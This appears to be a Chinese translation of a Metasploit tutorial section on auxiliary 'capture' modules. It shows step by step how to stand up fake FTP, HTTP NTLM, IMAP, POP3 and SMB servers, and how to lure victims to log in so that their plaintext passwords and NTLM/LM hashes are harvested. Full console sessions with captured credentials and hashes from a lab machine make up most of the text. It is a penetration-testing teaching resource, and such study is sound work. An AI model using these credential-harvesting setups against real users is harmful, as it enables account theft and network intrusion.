FTP
在“FTP”撷取模块和FTP服务器的行为,以获取用户凭据。
msf > use auxiliary/server/capture/ftp
msf auxiliary(ftp) > show options
Module options (auxiliary/server/capture/ftp):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 21 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture
默认设置适合我们的需要,所以我们只需运行该模块并诱使用户登录到我们的服务器。当我们捕获到我们需要的信息时,我们会终止服务器运行的作业。
msf auxiliary(ftp) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(ftp) >
[*] FTP LOGIN 192.168.1.195:1475 bobsmith / s3cr3t
[*] FTP LOGIN 192.168.1.195:1475 bsmith / s3cr3t
[*] FTP LOGIN 192.168.1.195:1475 bob / s3cr3tp4s
msf auxiliary(ftp) > jobs -l
Jobs
====
Id Name
-- ----
1 Auxiliary: server/capture/ftp
msf auxiliary(ftp) > kill 1
Stopping job: 1...
[*] Server stopped.
msf auxiliary(ftp) >
http_ntlm
该“http_ntlm”捕获模块试图悄悄地赶上NTLM / LM哈希挑战通过HTTP。
msf > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > show options
Module options (auxiliary/server/capture/http_ntlm):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer
这个模块有几个可用于微调的选项,包括以Cain和Abel格式保存任何捕获的散列的能力。对于我们的设置,我们设置LOGFILE值以将散列保存到文本文件,将我们的SRVPORT值设置为在端口80上侦听,并将URIPATH配置为/以增加真实性。
msf auxiliary(http_ntlm) > set LOGFILE captured_hashes.txt
LOGFILE => captured_hashes.txt
msf auxiliary(http_ntlm) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(http_ntlm) > set URIPATH /
URIPATH => /
msf auxiliary(http_ntlm) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.101:80/
[*] Server started.
msf auxiliary(http_ntlm) >
[*] Request '/' from 192.168.1.195:1964
[*] Request '/' from 192.168.1.195:1964
[*] Request '/' from 192.168.1.195:1964
[*] 192.168.1.195: V-MAC-XP\Administrator 397ff8a937165f55fdaaa0bc7130b1a22f85252cc731bb25:af44a1131410665e6dd99eea8f16deb3e81ed4ecc4cb7d2b on V-MAC-XP
msf auxiliary(http_ntlm) > jobs -l
Jobs
====
Id Name
-- ----
0 Auxiliary: server/capture/http_ntlm
msf auxiliary(http_ntlm) > kill 0
Stopping job: 0...
[*] Server stopped.
msf auxiliary(http_ntlm) >
如上所示,只要我们的受害者使用Internet Explorer浏览我们的服务器,管理员散列就会在没有任何用户交互的情况下收集。
IMAP
在“IMAP”捕获模块作为IMAP服务器,以便收集用户的邮件凭证。
msf > use auxiliary/server/capture/imap
msf auxiliary(imap) > show options
Module options (auxiliary/server/capture/imap):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 143 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture
我们不需要为这个模块做任何额外的配置,所以我们让它运行,然后说服用户连接到我们的服务器并收集他的凭证。
msf auxiliary(imap) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(imap) >
[*] IMAP LOGIN 192.168.1.195:2067 "victim" / "s3cr3t"
msf auxiliary(imap) > jobs -l
Jobs
====
Id Name
-- ----
0 Auxiliary: server/capture/imap
msf auxiliary(imap) > kill 0
Stopping job: 0...
[*] Server stopped.
msf auxiliary(imap) >
POP3
在“POP3”捕获模块构成为POP3邮件服务器,以捕获用户的邮件凭证。
msf > use auxiliary/server/capture/pop3
msf auxiliary(pop3) > show options
Module options (auxiliary/server/capture/pop3):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 110 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture
我们将保留默认设置,运行模块,然后说服受害者向我们的服务器进行身份验证。
msf auxiliary(pop3) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(pop3) >
[*] POP3 LOGIN 192.168.1.195:2084 victim / s3cr3t
msf auxiliary(pop3) > jobs -l
Jobs
====
Id Name
-- ----
1 Auxiliary: server/capture/pop3
msf auxiliary(pop3) > kill 1
Stopping job: 1...
[*] Server stopped.
msf auxiliary(pop3) >
SMB
在“SMB”捕获模块作为一个SMB共享来捕获用户的密码哈希,使他们能够在以后利用。
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show options
Module options (auxiliary/server/capture/smb):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte server challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in John format
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
Auxiliary action:
Name Description
---- -----------
Sniffer
该模块有许多可用选项。我们只设置JOHNPWFILE选项来保存John the Ripper格式的捕获哈希,运行模块并说服用户连接到我们的“共享”。
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhashes.txt
JOHNPWFILE => /tmp/smbhashes.txt
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >
[*] Mon Mar 28 10:21:56 -0600 2011
NTLMv1 Response Captured from 192.168.1.195:2111
V-MAC-XP\Administrator OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:397ff8a937165f55fdaaa0bc7130b1a22f85252cc731bb25
NTHASH:af44a1131410665e6dd99eea8f16deb3e81ed4ecc4cb7d2b
msf auxiliary(smb) > jobs -l
Jobs
====
Id Name
-- ----
2 Auxiliary: server/capture/smb
msf auxiliary(smb) > kill 2
Stopping job: 2...
[*] Server stopped.
msf auxiliary(smb) >